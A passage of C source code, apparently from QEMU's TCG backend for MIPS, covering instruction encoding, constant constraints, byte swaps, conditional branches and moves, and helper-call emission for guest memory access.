tcg_regset_reset_reg(ct->u.regs, TCG_REG_A3); } else { tcg_regset_reset_reg(ct->u.regs, TCG_REG_A1); } #endif break; case 'I': ct->ct |= TCG_CT_CONST_U16; break; case 'J': ct->ct |= TCG_CT_CONST_S16; break; case 'K': ct->ct |= TCG_CT_CONST_P2M1; break; case 'N': ct->ct |= TCG_CT_CONST_N16; break; case 'W': ct->ct |= TCG_CT_CONST_WSZ; break; case 'Z': /* We are cheating a bit here, using the fact that the register ZERO is also the register number 0. Hence there is no need to check for const_args in each instruction. */ ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct; ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_N16) && val >= -32767 && val <= 32767) { return 1; } else if ((ct & TCG_CT_CONST_P2M1) && use_mips32r2_instructions && is_p2m1(val)) { return 1; } else if ((ct & TCG_CT_CONST_WSZ) && val == (type == TCG_TYPE_I32 ? 
32 : 64)) { return 1; } return 0; } /* instruction opcodes */ typedef enum { OPC_J = 002 << 26, OPC_JAL = 003 << 26, OPC_BEQ = 004 << 26, OPC_BNE = 005 << 26, OPC_BLEZ = 006 << 26, OPC_BGTZ = 007 << 26, OPC_ADDIU = 011 << 26, OPC_SLTI = 012 << 26, OPC_SLTIU = 013 << 26, OPC_ANDI = 014 << 26, OPC_ORI = 015 << 26, OPC_XORI = 016 << 26, OPC_LUI = 017 << 26, OPC_DADDIU = 031 << 26, OPC_LB = 040 << 26, OPC_LH = 041 << 26, OPC_LW = 043 << 26, OPC_LBU = 044 << 26, OPC_LHU = 045 << 26, OPC_LWU = 047 << 26, OPC_SB = 050 << 26, OPC_SH = 051 << 26, OPC_SW = 053 << 26, OPC_LD = 067 << 26, OPC_SD = 077 << 26, OPC_SPECIAL = 000 << 26, OPC_SLL = OPC_SPECIAL | 000, OPC_SRL = OPC_SPECIAL | 002, OPC_ROTR = OPC_SPECIAL | 002 | (1 << 21), OPC_SRA = OPC_SPECIAL | 003, OPC_SLLV = OPC_SPECIAL | 004, OPC_SRLV = OPC_SPECIAL | 006, OPC_ROTRV = OPC_SPECIAL | 006 | 0100, OPC_SRAV = OPC_SPECIAL | 007, OPC_JR_R5 = OPC_SPECIAL | 010, OPC_JALR = OPC_SPECIAL | 011, OPC_MOVZ = OPC_SPECIAL | 012, OPC_MOVN = OPC_SPECIAL | 013, OPC_SYNC = OPC_SPECIAL | 017, OPC_MFHI = OPC_SPECIAL | 020, OPC_MFLO = OPC_SPECIAL | 022, OPC_DSLLV = OPC_SPECIAL | 024, OPC_DSRLV = OPC_SPECIAL | 026, OPC_DROTRV = OPC_SPECIAL | 026 | 0100, OPC_DSRAV = OPC_SPECIAL | 027, OPC_MULT = OPC_SPECIAL | 030, OPC_MUL_R6 = OPC_SPECIAL | 030 | 0200, OPC_MUH = OPC_SPECIAL | 030 | 0300, OPC_MULTU = OPC_SPECIAL | 031, OPC_MULU = OPC_SPECIAL | 031 | 0200, OPC_MUHU = OPC_SPECIAL | 031 | 0300, OPC_DIV = OPC_SPECIAL | 032, OPC_DIV_R6 = OPC_SPECIAL | 032 | 0200, OPC_MOD = OPC_SPECIAL | 032 | 0300, OPC_DIVU = OPC_SPECIAL | 033, OPC_DIVU_R6 = OPC_SPECIAL | 033 | 0200, OPC_MODU = OPC_SPECIAL | 033 | 0300, OPC_DMULT = OPC_SPECIAL | 034, OPC_DMUL = OPC_SPECIAL | 034 | 0200, OPC_DMUH = OPC_SPECIAL | 034 | 0300, OPC_DMULTU = OPC_SPECIAL | 035, OPC_DMULU = OPC_SPECIAL | 035 | 0200, OPC_DMUHU = OPC_SPECIAL | 035 | 0300, OPC_DDIV = OPC_SPECIAL | 036, OPC_DDIV_R6 = OPC_SPECIAL | 036 | 0200, OPC_DMOD = OPC_SPECIAL | 036 | 0300, OPC_DDIVU = OPC_SPECIAL | 037, OPC_DDIVU_R6 = OPC_SPECIAL | 037 | 0200, OPC_DMODU = OPC_SPECIAL | 037 | 0300, OPC_ADDU = OPC_SPECIAL | 041, OPC_SUBU = OPC_SPECIAL | 043, OPC_AND = OPC_SPECIAL | 044, OPC_OR = OPC_SPECIAL | 045, OPC_XOR = OPC_SPECIAL | 046, OPC_NOR = OPC_SPECIAL | 047, OPC_SLT = OPC_SPECIAL | 052, OPC_SLTU = OPC_SPECIAL | 053, OPC_DADDU = OPC_SPECIAL | 055, OPC_DSUBU = OPC_SPECIAL | 057, OPC_SELEQZ = OPC_SPECIAL | 065, OPC_SELNEZ = OPC_SPECIAL | 067, OPC_DSLL = OPC_SPECIAL | 070, OPC_DSRL = OPC_SPECIAL | 072, OPC_DROTR = OPC_SPECIAL | 072 | (1 << 21), OPC_DSRA = OPC_SPECIAL | 073, OPC_DSLL32 = OPC_SPECIAL | 074, OPC_DSRL32 = OPC_SPECIAL | 076, OPC_DROTR32 = OPC_SPECIAL | 076 | (1 << 21), OPC_DSRA32 = OPC_SPECIAL | 077, OPC_CLZ_R6 = OPC_SPECIAL | 0120, OPC_DCLZ_R6 = OPC_SPECIAL | 0122, OPC_REGIMM = 001 << 26, OPC_BLTZ = OPC_REGIMM | (000 << 16), OPC_BGEZ = OPC_REGIMM | (001 << 16), OPC_SPECIAL2 = 034 << 26, OPC_MUL_R5 = OPC_SPECIAL2 | 002, OPC_CLZ = OPC_SPECIAL2 | 040, OPC_DCLZ = OPC_SPECIAL2 | 044, OPC_SPECIAL3 = 037 << 26, OPC_EXT = OPC_SPECIAL3 | 000, OPC_DEXTM = OPC_SPECIAL3 | 001, OPC_DEXTU = OPC_SPECIAL3 | 002, OPC_DEXT = OPC_SPECIAL3 | 003, OPC_INS = OPC_SPECIAL3 | 004, OPC_DINSM = OPC_SPECIAL3 | 005, OPC_DINSU = OPC_SPECIAL3 | 006, OPC_DINS = OPC_SPECIAL3 | 007, OPC_WSBH = OPC_SPECIAL3 | 00240, OPC_DSBH = OPC_SPECIAL3 | 00244, OPC_DSHD = OPC_SPECIAL3 | 00544, OPC_SEB = OPC_SPECIAL3 | 02040, OPC_SEH = OPC_SPECIAL3 | 03040, /* MIPS r6 doesn't have JR, JALR should be used instead */ OPC_JR = use_mips32r6_instructions ? 
OPC_JALR : OPC_JR_R5, /* * MIPS r6 replaces MUL with an alternative encoding which is * backwards-compatible at the assembly level. */ OPC_MUL = use_mips32r6_instructions ? OPC_MUL_R6 : OPC_MUL_R5, /* MIPS r6 introduced names for weaker variants of SYNC. These are backward compatible to previous architecture revisions. */ OPC_SYNC_WMB = OPC_SYNC | 0x04 << 6, OPC_SYNC_MB = OPC_SYNC | 0x10 << 6, OPC_SYNC_ACQUIRE = OPC_SYNC | 0x11 << 6, OPC_SYNC_RELEASE = OPC_SYNC | 0x12 << 6, OPC_SYNC_RMB = OPC_SYNC | 0x13 << 6, /* Aliases for convenience. */ ALIAS_PADD = sizeof(void *) == 4 ? OPC_ADDU : OPC_DADDU, ALIAS_PADDI = sizeof(void *) == 4 ? OPC_ADDIU : OPC_DADDIU, ALIAS_TSRL = TARGET_LONG_BITS == 32 || TCG_TARGET_REG_BITS == 32 ? OPC_SRL : OPC_DSRL, } MIPSInsn; /* * Type reg */ static inline void tcg_out_opc_reg(TCGContext *s, MIPSInsn opc, TCGReg rd, TCGReg rs, TCGReg rt) { int32_t inst; inst = opc; inst |= (rs & 0x1F) << 21; inst |= (rt & 0x1F) << 16; inst |= (rd & 0x1F) << 11; tcg_out32(s, inst); } /* * Type immediate */ static inline void tcg_out_opc_imm(TCGContext *s, MIPSInsn opc, TCGReg rt, TCGReg rs, TCGArg imm) { int32_t inst; inst = opc; inst |= (rs & 0x1F) << 21; inst |= (rt & 0x1F) << 16; inst |= (imm & 0xffff); tcg_out32(s, inst); } /* * Type bitfield */ static inline void tcg_out_opc_bf(TCGContext *s, MIPSInsn opc, TCGReg rt, TCGReg rs, int msb, int lsb) { int32_t inst; inst = opc; inst |= (rs & 0x1F) << 21; inst |= (rt & 0x1F) << 16; inst |= (msb & 0x1F) << 11; inst |= (lsb & 0x1F) << 6; tcg_out32(s, inst); } static inline void tcg_out_opc_bf64(TCGContext *s, MIPSInsn opc, MIPSInsn opm, MIPSInsn oph, TCGReg rt, TCGReg rs, int msb, int lsb) { if (lsb >= 32) { opc = oph; msb -= 32; lsb -= 32; } else if (msb >= 32) { opc = opm; msb -= 32; } tcg_out_opc_bf(s, opc, rt, rs, msb, lsb); } /* * Type branch */ static inline void tcg_out_opc_br(TCGContext *s, MIPSInsn opc, TCGReg rt, TCGReg rs) { tcg_out_opc_imm(s, opc, rt, rs, 0); } /* * Type sa */ static inline void tcg_out_opc_sa(TCGContext *s, MIPSInsn opc, TCGReg rd, TCGReg rt, TCGArg sa) { int32_t inst; inst = opc; inst |= (rt & 0x1F) << 16; inst |= (rd & 0x1F) << 11; inst |= (sa & 0x1F) << 6; tcg_out32(s, inst); } static void tcg_out_opc_sa64(TCGContext *s, MIPSInsn opc1, MIPSInsn opc2, TCGReg rd, TCGReg rt, TCGArg sa) { int32_t inst; inst = (sa & 32 ? opc2 : opc1); inst |= (rt & 0x1F) << 16; inst |= (rd & 0x1F) << 11; inst |= (sa & 0x1F) << 6; tcg_out32(s, inst); } /* * Type jump. * Returns true if the branch was in range and the insn was emitted. */ static bool tcg_out_opc_jmp(TCGContext *s, MIPSInsn opc, void *target) { uintptr_t dest = (uintptr_t)target; uintptr_t from = (uintptr_t)s->code_ptr + 4; int32_t inst; /* The pc-region branch happens within the 256MB region of the delay slot (thus the +4). 
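       A J-type instruction encodes only bits 27..2 of the target; the
       upper four bits are taken from the address of the delay slot, so
       source and destination must lie in the same 256MB-aligned region
       for the encoding to be usable.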
*/ if ((from ^ dest) & -(1 << 28)) { return false; } tcg_debug_assert((dest & 3) == 0); inst = opc; inst |= (dest >> 2) & 0x3ffffff; tcg_out32(s, inst); return true; } static inline void tcg_out_nop(TCGContext *s) { tcg_out32(s, 0); } static inline void tcg_out_dsll(TCGContext *s, TCGReg rd, TCGReg rt, TCGArg sa) { tcg_out_opc_sa64(s, OPC_DSLL, OPC_DSLL32, rd, rt, sa); } static inline void tcg_out_dsrl(TCGContext *s, TCGReg rd, TCGReg rt, TCGArg sa) { tcg_out_opc_sa64(s, OPC_DSRL, OPC_DSRL32, rd, rt, sa); } static inline void tcg_out_dsra(TCGContext *s, TCGReg rd, TCGReg rt, TCGArg sa) { tcg_out_opc_sa64(s, OPC_DSRA, OPC_DSRA32, rd, rt, sa); } static inline bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { /* Simple reg-reg move, optimising out the 'do nothing' case */ if (ret != arg) { tcg_out_opc_reg(s, OPC_OR, ret, arg, TCG_REG_ZERO); } return true; } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { arg = (int32_t)arg; } if (arg == (int16_t)arg) { tcg_out_opc_imm(s, OPC_ADDIU, ret, TCG_REG_ZERO, arg); return; } if (arg == (uint16_t)arg) { tcg_out_opc_imm(s, OPC_ORI, ret, TCG_REG_ZERO, arg); return; } if (TCG_TARGET_REG_BITS == 32 || arg == (int32_t)arg) { tcg_out_opc_imm(s, OPC_LUI, ret, TCG_REG_ZERO, arg >> 16); } else { tcg_out_movi(s, TCG_TYPE_I32, ret, arg >> 31 >> 1); if (arg & 0xffff0000ull) { tcg_out_dsll(s, ret, ret, 16); tcg_out_opc_imm(s, OPC_ORI, ret, ret, arg >> 16); tcg_out_dsll(s, ret, ret, 16); } else { tcg_out_dsll(s, ret, ret, 32); } } if (arg & 0xffff) { tcg_out_opc_imm(s, OPC_ORI, ret, ret, arg & 0xffff); } } static inline void tcg_out_bswap16(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); } else { /* ret and arg can't be register at */ if (ret == TCG_TMP0 || arg == TCG_TMP0) { tcg_abort(); } tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); tcg_out_opc_sa(s, OPC_SLL, ret, arg, 8); tcg_out_opc_imm(s, OPC_ANDI, ret, ret, 0xff00); tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); } } static inline void tcg_out_bswap16s(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); tcg_out_opc_reg(s, OPC_SEH, ret, 0, ret); } else { /* ret and arg can't be register at */ if (ret == TCG_TMP0 || arg == TCG_TMP0) { tcg_abort(); } tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); tcg_out_opc_sa(s, OPC_SRA, ret, ret, 16); tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); } } static void tcg_out_bswap_subr(TCGContext *s, tcg_insn_unit *sub) { bool ok = tcg_out_opc_jmp(s, OPC_JAL, sub); tcg_debug_assert(ok); } static void tcg_out_bswap32(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); tcg_out_opc_sa(s, OPC_ROTR, ret, ret, 16); } else { tcg_out_bswap_subr(s, bswap32_addr); /* delay slot -- never omit the insn, like tcg_out_mov might. */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP0, arg, TCG_REG_ZERO); tcg_out_mov(s, TCG_TYPE_I32, ret, TCG_TMP3); } } static void tcg_out_bswap32u(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_DSBH, ret, 0, arg); tcg_out_opc_reg(s, OPC_DSHD, ret, 0, ret); tcg_out_dsrl(s, ret, ret, 32); } else { tcg_out_bswap_subr(s, bswap32u_addr); /* delay slot -- never omit the insn, like tcg_out_mov might. 
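
   A minimal sketch of the hazard (hypothetical helper name, not in this
   file):

     static void emit_bswap_call(TCGContext *s, tcg_insn_unit *sub, TCGReg arg)
     {
         tcg_out_bswap_subr(s, sub);   // emits JAL; the next insn is its delay slot
         // tcg_out_mov(s, TCG_TYPE_I32, TCG_TMP0, arg) would emit NOTHING
         // when arg == TCG_TMP0, letting an unrelated insn slide into the
         // delay slot; the explicit OR below always occupies it.
     }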
*/ tcg_out_opc_reg(s, OPC_OR, TCG_TMP0, arg, TCG_REG_ZERO); tcg_out_mov(s, TCG_TYPE_I32, ret, TCG_TMP3); } } static void tcg_out_bswap64(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_DSBH, ret, 0, arg); tcg_out_opc_reg(s, OPC_DSHD, ret, 0, ret); } else { tcg_out_bswap_subr(s, bswap64_addr); /* delay slot -- never omit the insn, like tcg_out_mov might. */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP0, arg, TCG_REG_ZERO); tcg_out_mov(s, TCG_TYPE_I32, ret, TCG_TMP3); } } static inline void tcg_out_ext8s(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_SEB, ret, 0, arg); } else { tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); tcg_out_opc_sa(s, OPC_SRA, ret, ret, 24); } } static inline void tcg_out_ext16s(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_SEH, ret, 0, arg); } else { tcg_out_opc_sa(s, OPC_SLL, ret, arg, 16); tcg_out_opc_sa(s, OPC_SRA, ret, ret, 16); } } static inline void tcg_out_ext32u(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_bf(s, OPC_DEXT, ret, arg, 31, 0); } else { tcg_out_dsll(s, ret, arg, 32); tcg_out_dsrl(s, ret, ret, 32); } } static void tcg_out_ldst(TCGContext *s, MIPSInsn opc, TCGReg data, TCGReg addr, intptr_t ofs) { int16_t lo = ofs; if (ofs != lo) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - lo); if (addr != TCG_REG_ZERO) { tcg_out_opc_reg(s, ALIAS_PADD, TCG_TMP0, TCG_TMP0, addr); } addr = TCG_TMP0; } tcg_out_opc_imm(s, opc, data, addr, lo); } static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { MIPSInsn opc = OPC_LD; if (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32) { opc = OPC_LW; } tcg_out_ldst(s, opc, arg, arg1, arg2); } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { MIPSInsn opc = OPC_SD; if (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32) { opc = OPC_SW; } tcg_out_ldst(s, opc, arg, arg1, arg2); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (val == 0) { tcg_out_st(s, type, TCG_REG_ZERO, base, ofs); return true; } return false; } static void tcg_out_addsub2(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, TCGArg bl, TCGArg bh, bool cbl, bool cbh, bool is_sub) { TCGReg th = TCG_TMP1; /* If we have a negative constant such that negating it would make the high part zero, we can (usually) eliminate one insn. */ if (cbl && cbh && bh == -1 && bl != 0) { bl = -bl; bh = 0; is_sub = !is_sub; } /* By operating on the high part first, we get to use the final carry operation to move back from the temporary. */ if (!cbh) { tcg_out_opc_reg(s, (is_sub ? OPC_SUBU : OPC_ADDU), th, ah, bh); } else if (bh != 0 || ah == rl) { tcg_out_opc_imm(s, OPC_ADDIU, th, ah, (is_sub ? -bh : bh)); } else { th = ah; } /* Note that tcg optimization should eliminate the bl == 0 case. 
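
   In C terms the sequences below compute (32-bit sketch):

     add:  rl = al + bl;
           carry = (uint32_t)rl < (uint32_t)bl;   // the SLTU after the ADDU
           rh = (ah + bh) + carry;

     sub:  borrow = (uint32_t)al < (uint32_t)bl;  // the SLTU before the SUBU
           rl = al - bl;
           rh = (ah - bh) - borrow;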
*/ if (is_sub) { if (cbl) { tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, al, bl); tcg_out_opc_imm(s, OPC_ADDIU, rl, al, -bl); } else { tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, al, bl); tcg_out_opc_reg(s, OPC_SUBU, rl, al, bl); } tcg_out_opc_reg(s, OPC_SUBU, rh, th, TCG_TMP0); } else { if (cbl) { tcg_out_opc_imm(s, OPC_ADDIU, rl, al, bl); tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, rl, bl); } else if (rl == al && rl == bl) { tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, al, TCG_TARGET_REG_BITS - 1); tcg_out_opc_reg(s, OPC_ADDU, rl, al, bl); } else { tcg_out_opc_reg(s, OPC_ADDU, rl, al, bl); tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, rl, (rl == bl ? al : bl)); } tcg_out_opc_reg(s, OPC_ADDU, rh, th, TCG_TMP0); } } /* Bit 0 set if inversion required; bit 1 set if swapping required. */ #define MIPS_CMP_INV 1 #define MIPS_CMP_SWAP 2 static const uint8_t mips_cmp_map[16] = { [TCG_COND_LT] = 0, [TCG_COND_LTU] = 0, [TCG_COND_GE] = MIPS_CMP_INV, [TCG_COND_GEU] = MIPS_CMP_INV, [TCG_COND_LE] = MIPS_CMP_INV | MIPS_CMP_SWAP, [TCG_COND_LEU] = MIPS_CMP_INV | MIPS_CMP_SWAP, [TCG_COND_GT] = MIPS_CMP_SWAP, [TCG_COND_GTU] = MIPS_CMP_SWAP, }; static void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg arg1, TCGReg arg2) { MIPSInsn s_opc = OPC_SLTU; int cmp_map; switch (cond) { case TCG_COND_EQ: if (arg2 != 0) { tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); arg1 = ret; } tcg_out_opc_imm(s, OPC_SLTIU, ret, arg1, 1); break; case TCG_COND_NE: if (arg2 != 0) { tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); arg1 = ret; } tcg_out_opc_reg(s, OPC_SLTU, ret, TCG_REG_ZERO, arg1); break; case TCG_COND_LT: case TCG_COND_GE: case TCG_COND_LE: case TCG_COND_GT: s_opc = OPC_SLT; /* FALLTHRU */ case TCG_COND_LTU: case TCG_COND_GEU: case TCG_COND_LEU: case TCG_COND_GTU: cmp_map = mips_cmp_map[cond]; if (cmp_map & MIPS_CMP_SWAP) { TCGReg t = arg1; arg1 = arg2; arg2 = t; } tcg_out_opc_reg(s, s_opc, ret, arg1, arg2); if (cmp_map & MIPS_CMP_INV) { tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); } break; default: tcg_abort(); break; } } static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1, TCGReg arg2, TCGLabel *l) { static const MIPSInsn b_zero[16] = { [TCG_COND_LT] = OPC_BLTZ, [TCG_COND_GT] = OPC_BGTZ, [TCG_COND_LE] = OPC_BLEZ, [TCG_COND_GE] = OPC_BGEZ, }; MIPSInsn s_opc = OPC_SLTU; MIPSInsn b_opc; int cmp_map; switch (cond) { case TCG_COND_EQ: b_opc = OPC_BEQ; break; case TCG_COND_NE: b_opc = OPC_BNE; break; case TCG_COND_LT: case TCG_COND_GT: case TCG_COND_LE: case TCG_COND_GE: if (arg2 == 0) { b_opc = b_zero[cond]; arg2 = arg1; arg1 = 0; break; } s_opc = OPC_SLT; /* FALLTHRU */ case TCG_COND_LTU: case TCG_COND_GTU: case TCG_COND_LEU: case TCG_COND_GEU: cmp_map = mips_cmp_map[cond]; if (cmp_map & MIPS_CMP_SWAP) { TCGReg t = arg1; arg1 = arg2; arg2 = t; } tcg_out_opc_reg(s, s_opc, TCG_TMP0, arg1, arg2); b_opc = (cmp_map & MIPS_CMP_INV ? OPC_BEQ : OPC_BNE); arg1 = TCG_TMP0; arg2 = TCG_REG_ZERO; break; default: tcg_abort(); break; } tcg_out_opc_br(s, b_opc, arg1, arg2); if (l->has_value) { reloc_pc16(s->code_ptr - 1, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr - 1, R_MIPS_PC16, l, 0); } tcg_out_nop(s); } static TCGReg tcg_out_reduce_eq2(TCGContext *s, TCGReg tmp0, TCGReg tmp1, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh) { /* Merge highpart comparison into AH. */ if (bh != 0) { if (ah != 0) { tcg_out_opc_reg(s, OPC_XOR, tmp0, ah, bh); ah = tmp0; } else { ah = bh; } } /* Merge lowpart comparison into AL. 
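
   Taken together the three merges compute, in C terms,

     al' = (ah ^ bh) | (al ^ bl);   // zero iff the 64-bit pairs are equal

   with each XOR elided whenever one operand is the zero register.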
*/ if (bl != 0) { if (al != 0) { tcg_out_opc_reg(s, OPC_XOR, tmp1, al, bl); al = tmp1; } else { al = bl; } } /* Merge high and low part comparisons into AL. */ if (ah != 0) { if (al != 0) { tcg_out_opc_reg(s, OPC_OR, tmp0, ah, al); al = tmp0; } else { al = ah; } } return al; } static void tcg_out_setcond2(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh) { TCGReg tmp0 = TCG_TMP0; TCGReg tmp1 = ret; tcg_debug_assert(ret != TCG_TMP0); if (ret == ah || ret == bh) { tcg_debug_assert(ret != TCG_TMP1); tmp1 = TCG_TMP1; } switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: tmp1 = tcg_out_reduce_eq2(s, tmp0, tmp1, al, ah, bl, bh); tcg_out_setcond(s, cond, ret, tmp1, TCG_REG_ZERO); break; default: tcg_out_setcond(s, TCG_COND_EQ, tmp0, ah, bh); tcg_out_setcond(s, tcg_unsigned_cond(cond), tmp1, al, bl); tcg_out_opc_reg(s, OPC_AND, tmp1, tmp1, tmp0); tcg_out_setcond(s, tcg_high_cond(cond), tmp0, ah, bh); tcg_out_opc_reg(s, OPC_OR, ret, tmp1, tmp0); break; } } static void tcg_out_brcond2(TCGContext *s, TCGCond cond, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh, TCGLabel *l) { TCGCond b_cond = TCG_COND_NE; TCGReg tmp = TCG_TMP1; /* With branches, we emit between 4 and 9 insns with 2 or 3 branches. With setcond, we emit between 3 and 10 insns and only 1 branch, which ought to get better branch prediction. */ switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: b_cond = cond; tmp = tcg_out_reduce_eq2(s, TCG_TMP0, TCG_TMP1, al, ah, bl, bh); break; default: /* Minimize code size by preferring a compare not requiring INV. */ if (mips_cmp_map[cond] & MIPS_CMP_INV) { cond = tcg_invert_cond(cond); b_cond = TCG_COND_EQ; } tcg_out_setcond2(s, cond, tmp, al, ah, bl, bh); break; } tcg_out_brcond(s, b_cond, tmp, TCG_REG_ZERO, l); } static void tcg_out_movcond(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, TCGReg c2, TCGReg v1, TCGReg v2) { bool eqz = false; /* If one of the values is zero, put it last to match SEL*Z instructions */ if (use_mips32r6_instructions && v1 == 0) { v1 = v2; v2 = 0; cond = tcg_invert_cond(cond); } switch (cond) { case TCG_COND_EQ: eqz = true; /* FALLTHRU */ case TCG_COND_NE: if (c2 != 0) { tcg_out_opc_reg(s, OPC_XOR, TCG_TMP0, c1, c2); c1 = TCG_TMP0; } break; default: /* Minimize code size by preferring a compare not requiring INV. */ if (mips_cmp_map[cond] & MIPS_CMP_INV) { cond = tcg_invert_cond(cond); eqz = true; } tcg_out_setcond(s, cond, TCG_TMP0, c1, c2); c1 = TCG_TMP0; break; } if (use_mips32r6_instructions) { MIPSInsn m_opc_t = eqz ? OPC_SELEQZ : OPC_SELNEZ; MIPSInsn m_opc_f = eqz ? OPC_SELNEZ : OPC_SELEQZ; if (v2 != 0) { tcg_out_opc_reg(s, m_opc_f, TCG_TMP1, v2, c1); } tcg_out_opc_reg(s, m_opc_t, ret, v1, c1); if (v2 != 0) { tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP1); } } else { MIPSInsn m_opc = eqz ? OPC_MOVZ : OPC_MOVN; tcg_out_opc_reg(s, m_opc, ret, v1, c1); /* This should be guaranteed via constraints */ tcg_debug_assert(v2 == ret); } } static void tcg_out_call_int(TCGContext *s, tcg_insn_unit *arg, bool tail) { /* Note that the ABI requires the called function's address to be loaded into T9, even if a direct branch is in range. */ tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T9, (uintptr_t)arg); /* But do try a direct branch, allowing the cpu better insn prefetch. 
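
   Shapes produced below (sketch):

     tail:      movi t9, arg ; J arg     -- or JR t9 if arg is out of region
     non-tail:  movi t9, arg ; JAL arg   -- or JALR ra, t9

   T9 is loaded even when the direct branch is taken because
   position-independent callees derive their gp from t9 in the function
   prologue.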
*/ if (tail) { if (!tcg_out_opc_jmp(s, OPC_J, arg)) { tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_T9, 0); } } else { if (!tcg_out_opc_jmp(s, OPC_JAL, arg)) { tcg_out_opc_reg(s, OPC_JALR, TCG_REG_RA, TCG_REG_T9, 0); } } } static void tcg_out_call(TCGContext *s, tcg_insn_unit *arg) { tcg_out_call_int(s, arg, false); tcg_out_nop(s); } #if defined(CONFIG_SOFTMMU) #include "../tcg-ldst.inc.c" static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, #if TCG_TARGET_REG_BITS == 64 [MO_LESL] = helper_le_ldsl_mmu, [MO_BESL] = helper_be_ldsl_mmu, #endif }; static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* Helper routines for marshalling helper function arguments into * the correct registers and stack. * I is where we want to put this argument, and is updated and returned * for the next call. ARG is the argument itself. * * We provide routines for arguments which are: immediate, 32 bit * value in register, 16 and 8 bit values in register (which must be zero * extended before use) and 64 bit value in a lo:hi register pair. */ static int tcg_out_call_iarg_reg(TCGContext *s, int i, TCGReg arg) { if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tcg_out_mov(s, TCG_TYPE_REG, tcg_target_call_iarg_regs[i], arg); } else { /* For N32 and N64, the initial offset is different. But there we also have 8 argument register so we don't run out here. */ tcg_debug_assert(TCG_TARGET_REG_BITS == 32); tcg_out_st(s, TCG_TYPE_REG, arg, TCG_REG_SP, 4 * i); } return i + 1; } static int tcg_out_call_iarg_reg8(TCGContext *s, int i, TCGReg arg) { TCGReg tmp = TCG_TMP0; if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tmp = tcg_target_call_iarg_regs[i]; 